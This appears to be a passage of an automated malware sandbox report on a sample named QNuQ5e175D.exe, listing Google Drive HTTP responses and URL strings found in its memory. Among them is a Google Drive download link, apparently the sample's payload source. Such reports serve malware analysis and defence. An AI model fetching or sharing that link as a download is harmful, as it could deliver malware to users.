https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQjNjklE7Z7CkrJ0c2eibhlxijgDHGsFK4sfozC0ktT1FF00VTnE6TLNLOKAHvwqTUoContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:15:00 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-_bS7AF2ooonXMRoz1QntCw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRHiIk5OWEIMiNuXmNwG47Tjv0GwWBQh3X97hgHQnmrfthBIcQ2NQ2USWJYTOE9NQd_lw6GsfUContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:15:12 GMTContent-Security-Policy: script-src 'nonce-OJtKk1cEY_gxfHRSLrA8Kg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSq6ud_327R7xOMjGPXJwHGdAmG87EX8cjiSO49oI7NbwnaQ7lFhgWvUv_cy1t7NTyuhDkZK7EContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:15:24 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-0caRob6R8X__-ngXWLX0Kg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5HpEDFlNl_sVXkrI_HxMYa_wWbg_RuyUaMYs-q7tV_i2PoLblnkXgfaeHsY65fH1_qXIcgRJ0Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:15:36 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-huVe7-4IFBVgTTNQZDWENQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: QNuQ5e175D.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2848012889.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2605737447.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2117883344.00000000039E5000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2616356320.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2737528794.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2858855756.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039C1000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2240128134.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2605627561.0000000003A20000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039A8000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2483912865.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2969547485.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2250724175.00000000039DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
      Source: QNuQ5e175D.exe, 00000004.00000003.2372316393.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2495233223.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2605737447.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2483912865.00000000039DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dhttps://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=d
      Source: QNuQ5e175D.exe, 00000004.00000003.2969547485.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2250724175.00000000039DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
      Source: QNuQ5e175D.exe, 00000004.00000003.2969547485.00000000039DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/-
      Source: QNuQ5e175D.exe, 00000004.00000003.2495233223.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2726695465.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2848012889.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2605737447.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2616356320.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2737528794.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2858855756.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2483912865.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2969547485.00000000039DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/BA90920B1
      Source: QNuQ5e175D.exe, 00000004.00000003.2240155348.00000000039E3000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2495233223.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2726695465.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2848012889.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2605737447.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2616356320.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2737528794.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2858855756.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2240128134.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2483912865.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2969547485.00000000039DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/E_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
      Source: QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2969547485.00000000039DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/E_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=downloadA98
      Source: QNuQ5e175D.exe, 00000004.00000003.2848012889.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2858855756.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2969547485.00000000039DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/E_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=downloade
      Source: QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/E_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=downloadf
      Source: QNuQ5e175D.exe, 00000004.00000003.2361334924.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2372316393.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2495233223.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2726695465.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2848012889.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2605737447.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2616356320.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2737528794.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2858855756.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2483912865.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2969547485.00000000039DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/E_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=downloadoogle
      Source: QNuQ5e175D.exe, 00000004.00000003.2361334924.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2128656586.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2240155348.00000000039E3000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2372316393.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2128689468.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2495233223.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2726695465.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2848012889.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2605737447.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2117883344.00000000039E5000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2616356320.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2737528794.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2858855756.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2240128134.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2483912865.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2969547485.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2250724175.00000000039DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/E_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=downloadt
      Source: QNuQ5e175D.exe, 00000004.00000003.2361334924.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2372316393.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2495233223.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2726695465.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2848012889.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2605737447.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2616356320.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2737528794.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2858855756.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2483912865.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2969547485.00000000039DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/F4409BC0D96FBCBDDEEE6C0AFBF
      Source: QNuQ5e175D.exe, 00000004.00000003.2726695465.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2848012889.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2605737447.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2616356320.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2737528794.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2858855756.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2969547485.00000000039DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/e
      Source: QNuQ5e175D.exe, 00000004.00000003.2726695465.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2848012889.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2737528794.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2858855756.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2969547485.00000000039DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/ertificates
      Source: QNuQ5e175D.exe, 00000004.00000003.2361334924.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2128656586.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2240155348.00000000039E3000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2372316393.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2128689468.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2495233223.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2726695465.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2848012889.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2605737447.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2117883344.00000000039E5000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2616356320.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2737528794.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2858855756.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2240128134.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2483912865.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2969547485.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2250724175.00000000039DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/s
      Source: QNuQ5e175D.exe, 00000004.00000003.2726695465.00000000039DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/sr
      Source: QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039A8000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000002.3569724783.0000000005510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M
      Source: QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-MZ
      Source: QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-Mvr
      Source: QNuQ5e175D.exe, 00000004.00000003.2361334924.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2128656586.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2240155348.00000000039E3000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2372316393.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2128689468.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2495233223.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2726695465.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2007544968.00000000039E5000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2848012889.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2605737447.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2117883344.00000000039E5000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2616356320.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2737528794.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2858855756.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2240128134.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2483912865.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2969547485.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2250724175.00000000039DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
      Source: QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/0
      Source: QNuQ5e175D.exe, 00000004.00000002.3569389730.0000000003968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
      Source: QNuQ5e175D.exe, 00000004.00000003.2858855756.00000000039DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=downloadA9
      Source: QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=downloadFB
      Source: QNuQ5e175D.exe, 00000004.00000002.3569389730.0000000003968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=downloadIM
      Source: QNuQ5e175D.exe, 00000004.00000003.2361334924.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2128656586.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2240155348.00000000039E3000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2372316393.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2128689468.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2495233223.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2726695465.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2007544968.00000000039E5000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2848012889.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2605737447.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2117883344.00000000039E5000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2616356320.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2737528794.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2858855756.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2240128134.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2483912865.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2969547485.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2250724175.00000000039DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=downloadJ
